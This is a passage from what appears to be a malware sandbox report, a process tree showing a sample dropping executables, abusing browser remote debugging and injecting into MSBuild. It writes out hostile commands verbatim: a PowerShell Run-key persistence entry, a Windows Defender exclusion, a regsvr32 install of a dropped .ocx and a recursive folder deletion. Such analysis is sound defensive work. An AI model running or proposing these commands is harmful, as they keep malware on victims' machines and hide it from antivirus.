        Uses browser remote debugging
        
        PID:5004
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5360 /prefetch:8
        11⤵
        
        PID:4800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5408,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5448 /prefetch:8
        11⤵
        
        PID:4952
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5684,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5456 /prefetch:8
        11⤵
        
        PID:1212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5496,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5536 /prefetch:8
        11⤵
        
        PID:3308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5844,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5852 /prefetch:8
        11⤵
        
        PID:532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5412,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5840 /prefetch:8
        11⤵
        
        PID:4796
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:1208
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x268,0x7fffd803f208,0x7fffd803f214,0x7fffd803f220
        11⤵
        
        PID:5316
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1956,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=2256 /prefetch:3
        11⤵
        
        PID:5680
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2228,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:2
        11⤵
        
        PID:1040
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1408,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:8
        11⤵
        
        PID:4784
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3560,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=3652 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:2324
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3568,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:3852
        
        C:\ProgramData\sjeknyus2n.exe
        
        "C:\ProgramData\sjeknyus2n.exe"
        10⤵
        
        PID:3804
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:5452
        
        C:\ProgramData\t2vknozusr.exe
        
        "C:\ProgramData\t2vknozusr.exe"
        10⤵
        
        PID:2444
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        12⤵
        Uses browser remote debugging
        
        PID:12072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffe85edcf8,0x7fffe85edd04,0x7fffe85edd10
        13⤵
        
        PID:12116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2748,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2528 /prefetch:2
        13⤵
        
        PID:2496
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2784 /prefetch:3
        13⤵
        
        PID:3552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2084,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2800 /prefetch:8
        13⤵
        
        PID:5216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:1212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3308 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:3308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4224,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4240 /prefetch:2
        13⤵
        Uses browser remote debugging
        
        PID:4184
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4416,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4664 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:6676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5208,i,18123681450451152524,6306899604182625967,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5196 /prefetch:8
        13⤵
        
        PID:8876
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        12⤵
        Uses browser remote debugging
        
        PID:8008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
        13⤵
        Uses browser remote debugging
        
        PID:8064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f0,0x7fffc675f208,0x7fffc675f214,0x7fffc675f220
        14⤵
        
        PID:7880
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1312
        12⤵
        Program crash
        
        PID:6716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1840
        12⤵
        Program crash
        
        PID:8636
        
        C:\ProgramData\8qiecb1dtj.exe
        
        "C:\ProgramData\8qiecb1dtj.exe"
        10⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exe
        
        C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\vFBg5nSU3JlfVZgZ.exe 0
        11⤵
        
        PID:784
        
        C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\r5Ar49XnOHOcT7d8.exe
        
        C:\Users\Admin\AppData\Local\Temp\sH9oHYT4\r5Ar49XnOHOcT7d8.exe 784
        12⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 1344
        13⤵
        Program crash
        
        PID:25580
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 1584
        12⤵
        Program crash
        
        PID:25556
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\3e3wt" & exit
        10⤵
        
        PID:6912
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        11⤵
        Delays execution with timeout.exe
        
        PID:7008
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3632
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\is-IB89K.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IB89K.tmp\Bell_Setup16.tmp" /SL5="$B01CA,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\is-08HSJ.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-08HSJ.tmp\Bell_Setup16.tmp" /SL5="$70210,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:468
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        12⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        8⤵
        Executes dropped EXE
        
        PID:2296
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        9⤵
        Executes dropped EXE
        
        PID:2348
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        10⤵
        Executes dropped EXE
        
        PID:1484
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        11⤵
        Executes dropped EXE
        
        PID:5276
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        12⤵
        Executes dropped EXE
        
        PID:5216
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        13⤵
        Executes dropped EXE
        
        PID:5596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        14⤵
        Executes dropped EXE
        
        PID:2432
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        15⤵
        Executes dropped EXE
        
        PID:2688
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        16⤵
        Executes dropped EXE
        
        PID:2140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        17⤵
        Executes dropped EXE
        
        PID:932
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        18⤵
        Executes dropped EXE
        
        PID:5256
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        19⤵
        Executes dropped EXE
        
        PID:1148
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        20⤵
        Executes dropped EXE
        
        PID:548
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        21⤵
        Executes dropped EXE
        
        PID:1116
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        22⤵
        Executes dropped EXE
        
        PID:3620
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        23⤵
        Executes dropped EXE
        
        PID:5800
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        24⤵
        Executes dropped EXE
        
        PID:3208
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        25⤵
        Executes dropped EXE
        
        PID:3480
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        26⤵
        Executes dropped EXE
        
        PID:1088
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        27⤵
        Executes dropped EXE
        
        PID:404
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        28⤵
        Executes dropped EXE
        
        PID:3684
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        29⤵
        Executes dropped EXE
        
        PID:5684
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        30⤵
        Executes dropped EXE
        
        PID:4424
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        31⤵
        Executes dropped EXE
        
        PID:2996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        32⤵
        Executes dropped EXE
        
        PID:1680
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        33⤵
        Executes dropped EXE
        
        PID:4260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        34⤵
        Executes dropped EXE
        
        PID:5316
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        35⤵
        Executes dropped EXE
        
        PID:3644
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        36⤵
        Executes dropped EXE
        
        PID:5616
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        37⤵
        Executes dropped EXE
        
        PID:3620
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        38⤵
        Executes dropped EXE
        
        PID:5520
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        39⤵
        Executes dropped EXE
        
        PID:4732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        40⤵
        Executes dropped EXE
        
        PID:3228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        41⤵
        Executes dropped EXE
        
        PID:2032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        42⤵
        Executes dropped EXE
        
        PID:1088
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        43⤵
        Executes dropped EXE
        
        PID:5900
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        44⤵
        
        PID:3280
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        45⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        46⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        47⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        48⤵
        
        PID:4112
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        49⤵
        
        PID:3380
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_platform.exe"
        50⤵
        Modifies registry key
        
        PID:2308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe\"'"
        50⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        
        PID:2600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath" C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5964
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5960
        
        C:\Users\Admin\AppData\Local\Temp\10044090101\eb2df5e704.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044090101\eb2df5e704.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044090101\eb2df5e704.exe"
        9⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\10044100101\6dbecdb1f3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044100101\6dbecdb1f3.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044100101\6dbecdb1f3.exe"
        9⤵
        
        PID:876
      - C:\Users\Admin\AppData\Local\Temp\10370210101\7866b52300.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370210101\7866b52300.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3280
      - C:\Users\Admin\AppData\Local\Temp\10370260101\194b034ebb.exe
        
